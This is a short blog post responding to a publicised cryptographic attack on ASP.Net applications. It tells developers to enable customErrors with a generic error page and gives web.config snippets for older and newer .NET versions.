Well, unless you’ve been living under a rock for the last week you are probably now aware of the Crypto attack that is in the wild and targets ASP.Net applications. This attack is raising many of the same issues that we see regularly in the industry with SQL Injection Attacks.
Wait, what?? Yes, this is another of those situations where Developers and Administrators have been lazy. Yes, it is a Vulnerability and it needs to be fixed, but it’s also become a massive issue because a large number of ASP.Net applications don’t handle errors correctly.
The recommended workaround (from the MS Security Advisory) is to simply enable customErrors and redirect to a generic error page. Simple fact is that EVERY ASP.Net app out there should be doing this already. This is one of the many steps to mitigating against attacks on websites including SQL Injection attacks. Returning any information to potentially malicious users is bad.
So, let me quickly run through the bare essentials.
If your using .Net 3.0 or earlier, add this to your config file:
<configuration>
<location allowOverride="false">
<system.web>
<customErrors mode="On"
defaultRedirect="~/error.html" />
</system.web>
</location>
</configuration>
For .Net 3.5 and above
<configuration>
<location allowOverride="false">
<system.web>
<customErrors mode="On"
redirectMode="ResponseRewrite"
defaultRedirect="~/ErrorPage.aspx" />
</system.web>
</location>
</configuration>
Please, don’t be lazy, make sure your Web Apps are secure.
No comments:
Post a Comment